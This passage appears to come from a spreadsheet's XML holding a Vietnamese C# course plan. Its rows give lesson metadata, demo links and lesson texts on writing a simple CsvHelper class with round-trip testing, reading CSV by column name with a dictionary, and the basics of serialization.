            Id = int.Parse(row[0]),
            Name = row[1],
            Price = decimal.Parse(row[2])
        });
    }
    return products;
}
Các nguyên tắc vàng khi phát triển lớp hỗ trợ
Khi bạn bắt đầu xây dựng lớp CsvHelper của riêng mình, hãy ghi nhớ những lời khuyên sau để đảm bảo tính ổn định:
Sử dụng IEnumerable hoặc yield return: Thay vì đọc toàn bộ tệp vào bộ nhớ (dễ gây tràn RAM với tệp lớn), hãy sử dụng yield return để trả về từng dòng một khi ứng dụng cần xử lý.
Xử lý tài nguyên: Luôn đảm bảo rằng các luồng đọc/ghi (StreamReader, StreamWriter) được đóng đúng cách bằng từ khóa using.
Tính cấu hình cao: Đừng "hard-code" dấu phân cách. Hãy truyền chúng vào qua constructor như ví dụ phía trên, điều này giúp lớp CsvHelper của bạn xử lý được cả tệp .csv (phân cách bằng dấu phẩy) và tệp .tsv hoặc tệp dùng dấu chấm phẩy (phổ biến ở Châu Âu).
Lời khuyên của chuyên gia: Trong thực tế, nếu ứng dụng của bạn cần xử lý các tệp CSV cực kỳ phức tạp (ví dụ: dữ liệu chứa dấu ngắt dòng trong dấu ngoặc kép), bạn có thể cân nhắc sử dụng các thư viện như CsvHelper (tên thư viện trùng tên với lớp chúng ta vừa tự viết) trên NuGet. Tuy nhiên, việc tự tay xây dựng một lớp đơn giản như trên là cách tốt nhất để bạn thấu hiểu bản chất của quá trình phân tích dữ liệu.
Việc tự xây dựng CsvHelper không chỉ giúp bạn làm chủ mã nguồn mà còn giúp bạn tự tin hơn khi đối mặt với các định dạng dữ liệu tùy chỉnh từ các hệ thống cũ hoặc các yêu cầu nghiệp vụ đặc thù mà các thư viện bên thứ ba có thể không hỗ trợ hoàn hảo.</t>
        </is>
      </c>
      <c r="W52" s="22" t="inlineStr">
        <is>
          <t># Xây dựng một lớp CsvHelper đơn giản
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích vì sao nên gom code đọc/ghi CSV vào một lớp thay vì rải khắp ứng dụng.
- Viết lớp `CsvHelper` với hai phương thức: `ToCsvLine` (đối tượng thành dòng) và `ParseLine` (dòng thành đối tượng).
- Dùng lại hàm `Esc` (ghi) và `SplitCsv` (đọc) để xử lý đúng dấu phẩy và nháy kép.
- Hiểu phép kiểm tra "round-trip": ghi rồi đọc lại phải ra đúng dữ liệu ban đầu.
- Quan sát một `Product` đi qua `ToCsvLine` và `ParseLine` bằng hoạt động mô phỏng.
## Vì sao cần một lớp CsvHelper?
Khi dự án lớn dần, các dòng `Split(',')` và `string.Join(",", ...)` rải rác khắp nơi sẽ khó sửa và dễ sai. Việc gom logic CSV vào một lớp mang lại ba lợi ích:
- **Trừu tượng:** nơi gọi chỉ cần `ToCsvLine(p)` hay `ParseLine(line)`, không cần biết bên trong xử lý nháy và dấu phẩy ra sao.
- **Nhất quán:** mọi nơi trong ứng dụng đọc và ghi CSV theo cùng một quy tắc.
- **Dễ mở rộng:** muốn thêm kiểm tra lỗi hay ghi log, chỉ sửa một chỗ.
## Hai chiều trong một lớp
Lớp `CsvHelper` của chúng ta lo cả hai chiều:
| Phương thức | Chiều | Mô tả |
|---|---|---|
| `ToCsvLine(Product p)` | ghi | Bọc nháy và nhân đôi nháy khi cần, rồi nối bằng dấu phẩy thành một dòng |
| `ParseLine(string line)` | đọc | Tách dòng thành trường đúng cách rồi dựng ra `Product` |
Hai phương thức này dựa vào hai hàm đã viết ở các bài trước:
- `Esc(string)`: bọc nháy kép và nhân đôi nháy khi trường chứa dấu phẩy, nháy kép hoặc xuống dòng.
- `SplitCsv(string)`: tách dòng thành danh sách trường, hiểu nháy kép (bộ phân tích theo trạng thái).
## Mã nguồn đầy đủ
```csharp
using System;
using System.Collections.Generic;
using System.Text;
public class Product
{
    public string Ma { get; set; }
    public string Ten { get; set; }
    public int Gia { get; set; }
    public Product(string ma, string ten, int gia)
    {
        Ma = ma;
        Ten = ten;
        Gia = gia;
    }
}
public static class CsvHelper
{
    // Chiều ghi: Product -&gt; dòng CSV
    public static string ToCsvLine(Product p)
    {
        return Esc(p.Ma) + ","
             + Esc(p.Ten) + ","
             + p.Gia;
    }
    // Chiều đọc: dòng CSV -&gt; Product
    public static Product ParseLine(string line)
    {
        var f = SplitCsv(line);
        return new Product(f[0], f[1], int.Parse(f[2]));
    }
    // Từ bài "Quy tắc xử lý dấu nháy kép khi ghi CSV"
    private static string Esc(string s)
    {
        if (s == null) return "";
        bool need = s.Contains(',') || s.Contains('"') || s.Contains('\n') || s.Contains('\r');
        if (!need) return s;
        return "\"" + s.Replace("\"", "\"\"") + "\"";
    }
    // Từ bài "Xử lý các trường có dấu nháy kép và dấu phân cách đặc biệt"
    private static List&lt;string&gt; SplitCsv(string line)
    {
        var fields = new List&lt;string&gt;();
        var cur = new StringBuilder();
        bool inQuote = false;
        for (int i = 0; i &lt; line.Length; i++)
        {
            char ch = line[i];
            if (ch == '"')
            {
                if (inQuote &amp;&amp; i + 1 &lt; line.Length &amp;&amp; line[i + 1] == '"')
                {
                    cur.Append('"');
                    i++;
                }
                else
                {
                    inQuote = !inQuote;
                }
            }
            else if (ch == ',' &amp;&amp; !inQuote)
            {
                fields.Add(cur.ToString());
                cur.Clear();
            }
            else
            {
                cur.Append(ch);
            }
        }
        fields.Add(cur.ToString());
        return fields;
    }
}
public class Program
{
    public static void Main()
    {
        var a = new Product("SP09", "Bút, mực \"đỏ\"", 15000);
        var csv = CsvHelper.ToCsvLine(a);
        var b = CsvHelper.ParseLine(csv);
        Console.WriteLine(csv);              // SP09,"Bút, mực ""đỏ""",15000
        Console.WriteLine(a.Ma == b.Ma);     // True
        Console.WriteLine(a.Ten == b.Ten);   // True
        Console.WriteLine(a.Gia == b.Gia);   // True
    }
}
```
`Esc` và `SplitCsv` để `private` vì chỉ `CsvHelper` cần dùng chúng. Nơi gọi chỉ thấy hai phương thức công khai.
## Kiểm tra bằng round-trip
Làm sao biết `ToCsvLine` và `ParseLine` khớp nhau? Ta dùng phép thử **round-trip** (đi một vòng): ghi đối tượng `a` ra dòng CSV, đọc dòng đó về thành đối tượng `b`, rồi so sánh từng trường. Nếu `b` giống hệt `a` thì hai chiều khớp nhau.
Dữ liệu thử nên cố tình khó. Tên `Bút, mực "đỏ"` chứa cả dấu phẩy lẫn nháy kép, nên nếu một trong hai phương thức xử lý nháy sai, phép so sánh sẽ cho `False` ngay.
## Hoạt động: Ghi rồi đọc lại
Mô phỏng dưới đây chạy đoạn thử ở cuối `Main`. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Ghi rồi đọc lại**. Đầu tiên, `a` là `Product` `SP09` với tên `Bút, mực "đỏ"` và giá 15000. Thẻ **CsvHelper** hiện hai phương thức `ToCsvLine(Product) → string` và `ParseLine(string) → Product`.
- Bước `ToCsvLine(a)`: lớp bọc nháy và nhân đôi nháy, ra dòng `SP09,"Bút, mực ""đỏ""",15000`. Trong hình "Vòng ghi rồi đọc", ô **Dòng CSV** sáng xanh.
- Bước `ParseLine(csv)`: dòng được tách thành 3 trường đúng rồi dựng ra `Product` mới tên `b`. Ô **Product b** sáng xanh và bảng "So sánh từng trường" điền giá trị của `b`.
- Ba bước tiếp theo in `a.Ma == b.Ma`, `a.Ten == b.Ten` và `a.Gia == b.Gia`. Mỗi lần cho `True` và cột "Khớp" của bảng có thêm một dấu tích xanh.
- Bước cuối: cả ba trường đều khớp, nên ghi rồi đọc lại ra đúng dữ liệu ban đầu.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/lam-viec-voi-du-lieu-co-cau-truc-csv/xu-ly-csv-nang-cao-va-ung-dung-thuc-te/xay-dung-mot-lop-csvhelper-don-gian/" title="Lớp CsvHelper đơn giản" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: một lớp lo cả hai chiều ghi và đọc, và dùng chung quy tắc nháy kép, thì dữ liệu đi một vòng sẽ không bị biến đổi. Phép thử round-trip là cách nhanh để kiểm tra điều đó.
## Gợi ý mở rộng
- **Truyền dấu phân cách qua constructor** thay vì gán cứng `,`, để lớp xử lý được cả tệp dùng `;` hoặc tab.
- **Đọc từng dòng với `File.ReadLines` và `yield return`** khi tệp lớn, để không phải nạp cả tệp vào bộ nhớ.
- **Bọc `using`** cho `StreamReader` và `StreamWriter` ở những phương thức làm việc trực tiếp với tệp.
- **Dùng thư viện** như `CsvHelper` trên NuGet cho các tệp phức tạp. Đây là thư viện có sẵn cùng tên với lớp ta vừa viết, nhưng tự viết một lớp nhỏ là cách tốt để hiểu bản chất.
## Tóm tắt
- Gom logic CSV vào một lớp giúp mã gọn, nhất quán và dễ mở rộng.
- `ToCsvLine` là chiều ghi, `ParseLine` là chiều đọc; hai chiều dùng chung quy tắc nháy kép.
- Hàm hỗ trợ như `Esc` và `SplitCsv` nên để `private` bên trong lớp.
- Phép thử round-trip: ghi rồi đọc lại, so sánh từng trường với đối tượng gốc.
- Khi dữ liệu phức tạp hoặc lớn, cân nhắc thư viện chuyên dụng.</t>
        </is>
      </c>
    </row>
    <row r="53" ht="409.6" customHeight="1" s="18">
      <c r="A53" s="10" t="n">
        <v>53</v>
      </c>
      <c r="B53" s="10" t="inlineStr">
        <is>
          <t>5. Làm việc với Dữ liệu có Cấu trúc (CSV)</t>
        </is>
      </c>
      <c r="C53" s="10" t="inlineStr">
        <is>
          <t>Xử lý CSV nâng cao và Ứng dụng thực tế</t>
        </is>
      </c>
      <c r="D53" s="10" t="inlineStr">
        <is>
          <t>Viết hàm đọc CSV linh hoạt</t>
        </is>
      </c>
      <c r="E53" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F53" s="13" t="inlineStr">
        <is>
          <t>Làm thêm nếu muốn</t>
        </is>
      </c>
      <c r="G53" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H53" s="10" t="inlineStr">
        <is>
          <t>Đọc đúng dữ liệu kể cả khi thứ tự cột trong tệp thay đổi, nhờ ánh xạ tên cột → chỉ số.</t>
        </is>
      </c>
      <c r="I53" s="10" t="inlineStr">
        <is>
          <t>2 cột song song: Đọc theo chỉ số cố định | Đọc theo tên cột</t>
        </is>
      </c>
      <c r="J53" s="10" t="inlineStr">
        <is>
          <t>Hàng tiêu đề với các thẻ cột; bên phải dựng Dictionary 'Ten → 0, Gia → 1, Ma → 2' từ tiêu đề, mũi tên nối từ tên tới chỉ số.</t>
        </is>
      </c>
      <c r="K53" s="10" t="inlineStr">
        <is>
          <t>H02, H17, H03</t>
        </is>
      </c>
      <c r="L53" s="10" t="inlineStr">
        <is>
          <t>1 tab</t>
        </is>
      </c>
      <c r="M53" s="10" t="inlineStr">
        <is>
          <t>Tệp có thứ tự cột mới: Ten,Gia,Ma.
Trái giả định parts[0] là Mã → Mã = "Bút bi" (sai).
Trái đọc giá ở parts[2] → int.Parse("SP01") → FormatException.
Phải đọc tiêu đề → dựng Dictionary tên cột → chỉ số.
Phải lấy giá trị theo col["Ma"], col["Gia"] → đúng.
Xong.</t>
        </is>
      </c>
      <c r="N53" s="10" t="inlineStr">
        <is>
          <t>Ten,Gia,Ma / Bút bi,5000,SP01</t>
        </is>
      </c>
      <c r="O53" s="10" t="inlineStr">
        <is>
          <t>Đọc theo tên cột giúp chương trình chịu được thay đổi thứ tự cột.</t>
        </is>
      </c>
      <c r="P53" s="10" t="n"/>
      <c r="Q53" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/lam-viec-voi-du-lieu-co-cau-truc-csv/xu-ly-csv-nang-cao-va-ung-dung-thuc-te/viet-ham-doc-csv-linh-hoat/index.html</t>
        </is>
      </c>
      <c r="R53" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/lam-viec-voi-du-lieu-co-cau-truc-csv/xu-ly-csv-nang-cao-va-ung-dung-thuc-te/viet-ham-doc-csv-linh-hoat/</t>
        </is>
      </c>
      <c r="S53" s="10" t="n"/>
      <c r="T53" s="12" t="n"/>
      <c r="U53" s="12" t="n"/>
      <c r="V53" s="21" t="inlineStr">
        <is>
          <t>Xây dựng hàm đọc CSV linh hoạt và tái sử dụng
Khi làm việc với các tệp dữ liệu có cấu trúc, việc chỉ biết đọc một tệp cố định là chưa đủ. Một lập trình viên chuyên nghiệp cần tư duy theo hướng xây dựng các hàm tổng quát (generic functions). Thay vì viết lại logic phân tách chuỗi mỗi khi gặp một tệp tin mới, chúng ta sẽ tập trung tạo ra một hàm đọc CSV "linh hoạt" — tức là một hàm có khả năng thích nghi với nhiều định dạng phân cách và cấu trúc dữ liệu khác nhau mà không cần sửa đổi mã nguồn.
Tham số hóa các thành phần thay đổi
Để một hàm đọc CSV trở nên linh hoạt, bước đầu tiên là xác định những yếu tố có thể thay đổi giữa các tệp tin. Thông thường, đó là:
Dấu phân cách (Delimiter): Không chỉ là dấu phẩy (,), nhiều hệ thống còn sử dụng dấu chấm phẩy (;), tab (\t) hoặc ký tự gạch đứng (|).
Ký tự trích dẫn (Quote Character): Để xử lý các chuỗi chứa dấu phân cách bên trong, chúng ta cần biết ký tự bao quanh chuỗi đó (thường là " ).
Số dòng tiêu đề (Header Lines): Có tệp có dòng tiêu đề, có tệp thì không.
Thay vì gán cứng (hard-coded) các giá trị này, chúng ta truyền chúng vào hàm dưới dạng tham số.
Triển khai phương thức đọc tổng quát
Dưới đây là một ví dụ về cách thiết kế một hàm đọc linh hoạt trong C#, sử dụng kiểu dữ liệu IEnumerable để tối ưu bộ nhớ khi làm việc với tệp lớn:
using System;
using System.Collections.Generic;
using System.IO;
public class CsvProcessor
{
    public IEnumerable&lt;string[]&gt; ReadCsv(string filePath, char delimiter = ',', bool hasHeader = true)
    {
        if (!File.Exists(filePath))
            throw new FileNotFoundException("Tệp không tồn tại", filePath);
        using (var reader = new StreamReader(filePath))
        {
            string line;
            bool isFirstLine = true;
            while ((line = reader.ReadLine()) != null)
            {
                if (hasHeader &amp;&amp; isFirstLine)
                {
                    isFirstLine = false;
                    continue; // Bỏ qua dòng tiêu đề
                }
                // Tách dữ liệu dựa trên dấu phân cách linh hoạt
                yield return line.Split(delimiter);
            }
        }
    }
}
Tại sao nên sử dụng yield return?
Trong đoạn mã trên, bạn có thể nhận thấy từ khóa yield return. Đây là một kỹ thuật mạnh mẽ trong C# khi làm việc với dữ liệu cấu trúc:
Tiết kiệm bộ nhớ: Thay vì đọc toàn bộ hàng triệu dòng vào một List rồi mới trả về, yield return sẽ trả về từng dòng một ngay khi nó được đọc.
Tối ưu hóa hiệu năng: Chương trình bắt đầu xử lý ngay dữ liệu đầu tiên mà không cần đợi toàn bộ tệp được load vào RAM.
Lưu ý: Việc sử dụng string.Split() đơn giản như trên chỉ hiệu quả với các tệp dữ liệu "sạch". Với các tệp chứa dấu phân cách nằm trong nội dung chuỗi (ví dụ: "Hà Nội, Việt Nam"), bạn sẽ cần tích hợp logic xử lý nâng cao hơn như đã thảo luận ở các bài trước để tránh bị tách sai trường.
Ứng dụng thực tế: Chuyển đổi định dạng dữ liệu
Một kịch bản thực tế là bạn cần đọc dữ liệu từ một tệp CSV có dấu phân cách là dấu chấm phẩy (;) và chuyển đổi nó thành một định dạng khác hoặc nạp vào danh sách đối tượng. Với hàm linh hoạt đã xây dựng, công việc của bạn trở nên đơn giản:
var processor = new CsvProcessor();
string path = "data_diachi.csv";
// Đọc tệp với cấu trúc đặc thù (dấu chấm phẩy)
foreach (var row in processor.ReadCsv(path, delimiter: ';', hasHeader: true))
{
    Console.WriteLine($"Người dùng: {row[0]}, Email: {row[1]}");
}
Tư duy thiết kế cho tương lai
Khi xây dựng các hàm đọc CSV, hãy luôn đặt câu hỏi: "Nếu ngày mai khách hàng gửi cho tôi một tệp với dấu phân cách mới, tôi có phải viết lại mã nguồn không?".
Nếu câu trả lời là "có", hãy quay lại và trừu tượng hóa các giá trị đó thành các biến cấu hình. Việc xây dựng thư viện riêng dựa trên tư duy này không chỉ giúp bạn xử lý CSV tốt hơn mà còn là nền tảng quan trọng để bạn tiếp cận các thư viện chuyên dụng như CsvHelper hoặc LINQ to CSV sau này, vì bạn đã thực sự hiểu "phía sau hậu trường" của việc đọc dữ liệu là như thế nào.</t>
        </is>
      </c>
      <c r="W53" s="22" t="inlineStr">
        <is>
          <t># Viết hàm đọc CSV linh hoạt
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích vì sao đọc CSV theo chỉ số cột cố định dễ hỏng khi thứ tự cột thay đổi.
- Dựng `Dictionary&lt;string, int&gt;` ánh xạ tên cột sang chỉ số từ dòng tiêu đề.
- Lấy giá trị theo tên cột, ví dụ `parts[col["Ma"]]`.
- Tham số hóa dấu phân cách và việc có dòng tiêu đề để hàm dùng lại được cho nhiều tệp.
- Quan sát hai cách đọc cùng một dòng, một cách hỏng và một cách đúng, bằng hoạt động mô phỏng.
## Vấn đề: thứ tự cột thay đổi
Giả sử code của bạn đọc tệp có tiêu đề `Ma,Ten,Gia`, và viết cứng như sau: cột 0 là mã, cột 2 là giá.
```csharp
string ma = parts[0];
int gia = int.Parse(parts[2]);
```
Hôm sau, đối tác gửi tệp mới với tiêu đề `Ten,Gia,Ma`. Dữ liệu vẫn đủ, chỉ khác thứ tự cột. Code cũ giờ đọc `parts[0]` là tên sản phẩm chứ không phải mã, và `parts[2]` là mã chứ không phải giá. Tệ hơn, dòng `ma = parts[0]` **không báo lỗi nào**: dữ liệu bị đọc nhầm âm thầm, cho đến khi `int.Parse("SP01")` ném `FormatException`.
Giải pháp: đừng nhớ "Ma ở cột 0", mà hãy **hỏi dòng tiêu đề** xem cột `Ma` đang ở vị trí nào.
## Ánh xạ tên cột sang chỉ số
Ý tưởng gồm hai bước:
1. Đọc dòng tiêu đề, dựng `Dictionary&lt;string, int&gt;`: với mỗi tên cột, lưu chỉ số của nó.
2. Với mỗi dòng dữ liệu, lấy giá trị bằng `parts[col["TênCột"]]`.
```csharp
using System;
using System.Collections.Generic;
public class Program
{
    public static void Main()
    {
        var head = "Ten,Gia,Ma".Split(',');
        var col = new Dictionary&lt;string, int&gt;();
        for (int i = 0; i &lt; head.Length; i++)
        {
            col[head[i]] = i;
        }
        // col: Ten -&gt; 0, Gia -&gt; 1, Ma -&gt; 2
        string line = "Bút bi,5000,SP01";
        var parts = line.Split(',');
        string ma = parts[col["Ma"]];                // SP01
        int gia = int.Parse(parts[col["Gia"]]);      // 5000
        Console.WriteLine(ma);
        Console.WriteLine(gia);
    }
}
```
Dù cột đứng ở đâu, tên cột vẫn dẫn tới đúng chỉ số. Nếu mai tệp đổi thành `Gia,Ma,Ten`, code không phải sửa.
## Hàm đọc tổng quát
Ta gói ý tưởng này thành một hàm dùng lại được. Hàm nhận đường dẫn và dấu phân cách, đọc dòng đầu làm tiêu đề, rồi trả về từng dòng dữ liệu dưới dạng `Dictionary&lt;string, string&gt;` (tên cột thành giá trị). `yield return` giúp trả từng dòng một, không nạp cả tệp vào bộ nhớ.
```csharp
using System;
using System.Collections.Generic;
using System.IO;
public class Program
{
    public static IEnumerable&lt;Dictionary&lt;string, string&gt;&gt; ReadCsvByName(
        string path, char delimiter = ',')
    {
        using (var reader = new StreamReader(path))
        {
            string headerLine = reader.ReadLine();
            if (headerLine == null)
            {
                yield break;   // tệp rỗng
            }
            string[] head = headerLine.Split(delimiter);
            string line;
            while ((line = reader.ReadLine()) != null)
            {
                if (line.Trim() == "")
                {
                    continue;
                }
                string[] parts = line.Split(delimiter);
                var row = new Dictionary&lt;string, string&gt;();
                for (int i = 0; i &lt; head.Length &amp;&amp; i &lt; parts.Length; i++)
                {
                    row[head[i]] = parts[i];
                }
                yield return row;
            }
        }
    }
    public static void Main()
    {
        File.WriteAllLines("sp.csv", new[] { "Ten;Gia;Ma", "Bút bi;5000;SP01", "Vở;12000;SP02" });
        foreach (var row in ReadCsvByName("sp.csv", ';'))
        {
            Console.WriteLine(row["Ma"] + " - " + int.Parse(row["Gia"]));
        }
        // SP01 - 5000
        // SP02 - 12000
    }
}
```
Những yếu tố thường thay đổi giữa các tệp đã được đưa thành tham số hoặc đọc từ tiêu đề:
- **Dấu phân cách** (`delimiter`): `,`, `;`, tab hoặc `|`.
- **Thứ tự và tên cột**: lấy từ dòng tiêu đề.
Hàm này vẫn dùng `Split`, nên chỉ phù hợp với dữ liệu "sạch". Nếu trường có thể chứa dấu phân cách hoặc nháy kép, hãy thay `Split` bằng bộ phân tích theo trạng thái ở bài trước.
## Hoạt động: Đổi thứ tự cột
Mô phỏng dưới đây có hai cột chạy song song trên cùng một tệp có tiêu đề `Ten,Gia,Ma` và dòng dữ liệu `Bút bi,5000,SP01`. Cột trái là cách đọc theo chỉ số cố định, cột phải là cách đọc theo tên cột. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để hai cột cùng chạy:
- Mở tab **Đổi thứ tự cột**. Cột trái ("Theo chỉ số cố định") giả định `Ma` ở cột 0 và `Gia` ở cột 2. Cột phải ("Theo tên cột") đọc dòng tiêu đề `Ten, Gia, Ma` rồi dựng `Dictionary` `col`: `Ten` là 0, `Gia` là 1, `Ma` là 2 (các ngăn mới màu xanh).
- Ở cột trái, `Split` cắt dòng thành 3 phần. `ma = parts[0]` cho `"Bút bi"`: ô này được tô đỏ vì đó là tên sản phẩm, không phải mã, và không có lỗi nào báo ra.
- Ở cột phải, `col["Ma"]` cho 2, nên `parts[2]` là `"SP01"`: đúng mã sản phẩm, ô được tô xanh.
- Bước kế tiếp ở cột trái, `int.Parse(parts[2])` nhận `"SP01"` nên ném `FormatException` với thông báo `The input string 'SP01' was not in a correct format.` và thẻ lỗi đỏ xuất hiện.
- Ở cột phải, `col["Gia"]` cho 1, nên `parts[1]` là `"5000"` và `int.Parse` ra 5000. Kết quả cuối là thẻ "Đọc đúng": `Ma` là `SP01`, `Gia` là 5000.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/lam-viec-voi-du-lieu-co-cau-truc-csv/xu-ly-csv-nang-cao-va-ung-dung-thuc-te/viet-ham-doc-csv-linh-hoat/" title="Đọc CSV theo tên cột" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: chỉ số cột cố định chỉ đúng khi thứ tự cột không bao giờ đổi, và khi sai nó có thể sai một cách im lặng. Đọc theo tên cột giúp chương trình chịu được thay đổi thứ tự cột.
## Tư duy thiết kế
Khi viết hàm đọc, hãy tự hỏi: "Nếu ngày mai khách gửi tệp với dấu phân cách mới hoặc thứ tự cột khác, mình có phải sửa code không?" Nếu có, hãy biến giá trị đó thành tham số hoặc đọc nó từ dữ liệu. Cách nghĩ này cũng là nền để bạn hiểu các thư viện CSV chuyên dụng, vốn cho phép lấy giá trị theo tên cột.
## Tóm tắt
- Đọc theo chỉ số cố định hỏng khi thứ tự cột thay đổi, và có thể đọc nhầm mà không báo lỗi.
- Dựng `Dictionary&lt;string, int&gt;` từ dòng tiêu đề để biết mỗi tên cột nằm ở đâu.
- Lấy giá trị bằng `parts[col["TênCột"]]`.
- Đưa các yếu tố thay đổi, như dấu phân cách, thành tham số của hàm.
- `yield return` giúp đọc tệp lớn từng dòng mà không tốn nhiều bộ nhớ.
- `Split` chỉ an toàn với dữ liệu sạch; dữ liệu có nháy kép cần bộ phân tích riêng.</t>
        </is>
      </c>
    </row>
    <row r="54" ht="409.6" customHeight="1" s="18">
      <c r="A54" s="10" t="n">
        <v>54</v>
      </c>
      <c r="B54" s="10" t="inlineStr">
        <is>
          <t>6. Lưu trữ Đối tượng với Serialization</t>
        </is>
      </c>
      <c r="C54" s="10" t="inlineStr">
        <is>
          <t>Giới Thiệu về Serialization và Khái Niệm Cơ Bản</t>
        </is>
      </c>
      <c r="D54" s="10" t="inlineStr">
        <is>
          <t>Khái niệm Serialization là gì?</t>
        </is>
      </c>
      <c r="E54" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F54" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G54" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H54" s="10" t="inlineStr">
        <is>
          <t>Hiểu serialize là biến đối tượng thành dạng lưu/gửi được, deserialize là dựng lại đối tượng từ dạng đó.</t>
        </is>
      </c>
      <c r="I54" s="10" t="inlineStr">
        <is>
          <t>1 cột, 2 tab</t>
        </is>
      </c>
      <c r="J54" s="10" t="inlineStr">
        <is>
          <t>Thẻ đối tượng Person#1 trong khung RAM → 'máy ép' Serialize → chuỗi JSON → biểu tượng tệp trên ổ đĩa. Chiều ngược lại: 'máy dựng' Deserialize → Person#2.</t>
        </is>
      </c>
      <c r="K54" s="10" t="inlineStr">
        <is>
          <t>H19, H10</t>
        </is>
      </c>
      <c r="L54" s="10" t="inlineStr">
        <is>
          <t>Serialize | Deserialize</t>
        </is>
      </c>
      <c r="M54" s="10" t="inlineStr">
        <is>
          <t>Serialize: Person { Name = "An", Age = 20 } (Person#1).
JsonSerializer.Serialize(p) → {"Name":"An","Age":20}.
File.WriteAllText("p.json", json) → tệp xuất hiện trên ổ đĩa.
Deserialize: tắt chương trình, RAM trống.
ReadAllText → Deserialize&lt;Person&gt; → Person#2: đối tượng mới, cùng dữ liệu.
Xong.</t>
        </is>
      </c>
      <c r="N54" s="10" t="inlineStr">
        <is>
          <t>Person An, 20</t>
        </is>
      </c>
      <c r="O54" s="10" t="inlineStr">
        <is>
          <t>Dữ liệu được bảo toàn qua serialize/deserialize, nhưng đối tượng nhận lại là đối tượng mới.</t>
        </is>
      </c>
      <c r="P54" s="10" t="n"/>
      <c r="Q54" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/luu-tru-doi-tuong-voi-serialization/gioi-thieu-ve-serialization-va-khai-niem-co-ban/khai-niem-serialization-la-gi/index.html</t>
        </is>
      </c>
      <c r="R54" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/luu-tru-doi-tuong-voi-serialization/gioi-thieu-ve-serialization-va-khai-niem-co-ban/khai-niem-serialization-la-gi/</t>
        </is>
      </c>
      <c r="S54" s="10" t="n"/>
      <c r="T54" s="12" t="n"/>
      <c r="U54" s="12" t="n"/>
      <c r="V54" s="21" t="inlineStr">
        <is>
          <t>Khái niệm Serialization là gì?
Trong phát triển ứng dụng, đặc biệt là với các ứng dụng C#, chúng ta thường xuyên làm việc với các đối tượng (objects) trong bộ nhớ. Các đối tượng này chứa dữ liệu và trạng thái của ứng dụng tại một thời điểm nhất định. Tuy nhiên, khi ứng dụng đóng lại, tất cả các đối tượng trong bộ nhớ sẽ biến mất. Vậy làm thế nào để chúng ta có thể "lưu" trạng thái của một đối tượng để sử dụng lại sau này, hoặc "gửi" nó đi cho một ứng dụng khác? Câu trả lời nằm ở kỹ thuật Serialization.
Serialization là gì?
Serialization (hay còn gọi là "tuần tự hóa") là quá trình chuyển đổi trạng thái của một đối tượng trong bộ nhớ thành một dạng có thể lưu trữ hoặc truyền đi. Hãy hình dung một đối tượng như một tòa nhà phức tạp với nhiều phòng ốc, đồ đạc (thuộc tính và giá trị). Serialization giống như việc bạn tạo ra một bản thiết kế chi tiết của tòa nhà đó, bao gồm tất cả thông tin cần thiết để xây dựng lại nó y hệt ở một nơi khác.
Dạng có thể lưu trữ hoặc truyền đi này thường là một chuỗi byte (byte stream), một chuỗi văn bản (ví dụ: JSON, XML) hoặc một định dạng nhị phân tùy chỉnh. Mục tiêu là biến một cấu trúc dữ liệu phức tạp trong bộ nhớ thành một "dòng" dữ liệu phẳng, dễ dàng ghi vào tệp, gửi qua mạng hoặc lưu trữ trong cơ sở dữ liệu.
Ví dụ, bạn có một đối tượng NhanVien với các thuộc tính như MaNhanVien, Ten, NgaySinh. Khi bạn "serialize" đối tượng này, hệ thống sẽ lấy tất cả các giá trị của các thuộc tính đó và đóng gói chúng vào một định dạng mà bạn chọn.
public class NhanVien
{
    public int MaNhanVien { get; set; }
    public string Ten { get; set; }
    public DateTime NgaySinh { get; set; }
    public decimal Luong { get; set; }
    public NhanVien(int ma, string ten, DateTime ngaySinh, decimal luong)
    {
        MaNhanVien = ma;
        Ten = ten;
        NgaySinh = ngaySinh;
        Luong = luong;
    }
    public void HienThiThongTin()
    {
        Console.WriteLine($"Mã NV: {MaNhanVien}, Tên: {Ten}, Ngày sinh: {NgaySinh.ToShortDateString()}, Lương: {Luong:C}");
    }
}
// Khi đối tượng NhanVien được tạo trong bộ nhớ:
NhanVien nv = new NhanVien(101, "Nguyen Van A", new DateTime(1990, 5, 15), 5000000);
// nv.MaNhanVien = 101, nv.Ten = "Nguyen Van A", ...
// Serialization sẽ chuyển đổi các giá trị này thành một dạng lưu trữ được.
Deserialization là gì?
Deserialization (hay còn gọi là "giải tuần tự hóa") là quá trình ngược lại của serialization. Nó là quá trình khôi phục một đối tượng từ dạng đã lưu trữ hoặc truyền đi trở về trạng thái ban đầu của nó trong bộ nhớ. Tiếp tục với ví dụ tòa nhà, deserialization giống như việc bạn đọc bản thiết kế và sử dụng nó để xây dựng lại tòa nhà y hệt, với tất cả các phòng ốc và đồ đạc đúng vị trí ban đầu.
Khi bạn deserializing một chuỗi byte, chuỗi văn bản, hoặc dữ liệu nhị phân, hệ thống sẽ đọc dữ liệu đó và tái tạo lại đối tượng NhanVien với các thuộc tính có giá trị chính xác như khi nó được serialized. Điều này cho phép ứng dụng của bạn tiếp tục làm việc với đối tượng đó như thể nó chưa bao giờ bị hủy khỏi bộ nhớ.
Tại sao Serialization lại quan trọng? Mục đích chính
